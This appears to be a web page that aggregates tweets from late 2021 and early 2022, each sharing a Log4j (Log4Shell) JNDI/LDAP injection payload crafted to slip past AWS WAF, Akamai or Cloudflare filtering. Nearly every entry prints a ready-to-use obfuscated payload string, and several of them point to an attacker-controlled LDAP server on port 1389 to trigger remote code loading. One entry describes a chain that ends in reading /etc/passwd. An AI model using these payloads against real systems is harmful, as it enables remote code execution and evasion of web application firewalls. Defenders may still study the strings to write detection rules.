LDAP injection

WAF bypass LDAP injection by ankit_anubhav

For #log4j malware hunters, #Muhstik is still trying. It wont bypass any decent WAF, they are not obfuscating requests. https ... March 4, 2022

AWS WAF , LDAP injection

WAF bypass LDAP injection by MBlacksolo

Finally aws waf bypass for log4j ${jnd${123%25ff:-${123%25ff:-i:}}ldap://attacker.com:1389/o} ... December 25, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by naglinagli

Working AWS/Cloudfront #log4j WAF Bypass within the URI path https:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}. ... December 24, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by nxtexploit

Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbou ... December 18, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by zapstiko

Previous AWS WAF bypass is patched.. here is another: @11xuxx ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} ... December 17, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by simrotion13

AWS WAF bypass ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydnsserver.com:1389/o} #bugbountytips #log4j #waf ... December 17, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by 11xuxx

Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbou ... December 17, 2021

Akamai , AWS WAF , LDAP injection

Akamai bypass LDAP injection by KuruyemisOz

Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to ... December 17, 2021

Akamai , AWS WAF , LDAP injection

Akamai bypass LDAP injection by Risto_Matti

Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to ... December 16, 2021

Akamai , AWS WAF , LDAP injection

Akamai bypass LDAP injection by zapstiko

Just bypassed AWS WAF for log4j jndi injection: @11xuxx ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who ... December 16, 2021

Akamai , AWS WAF , LDAP injection

Akamai bypass LDAP injection by 11xuxx

Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to ... December 15, 2021

LDAP injection

WAF bypass LDAP injection by ankit_anubhav

Todays' flow - #log4j #log4shell Rogue LDAP -> Base 64 Serialized data -> Char bytes -> etc/passwd WAF bypass : {${:: ... December 15, 2021

LDAP injection

WAF bypass LDAP injection by MasterSEC_AR

if the vulnerable app uses Log4jServletFilter in addition to log4j, it should be technically possible to bypass the hardest WA ... December 13, 2021

LDAP injection

WAF bypass LDAP injection by sirifu4k1

#log4j2 bypass waf tips base payload? ${jndi:ldap://127.0.0.1:1099/obj} these work well too ? https://t.co/IDA2PaHhVN pas: gF ... December 13, 2021

CloudFlare , LDAP injection

CloudFlare bypass LDAP injection by anthrax0

Cloudflare #log4j #log4shell bypass: ${${lower:jnd}${lower:${upper:?}}:ldap://...} ... December 13, 2021

LDAP injection

WAF bypass LDAP injection by Frichette_n

This indeed does work. I think the “i” character is the only one in “jndi:ldap” that works like that. Another likely W ... December 13, 2021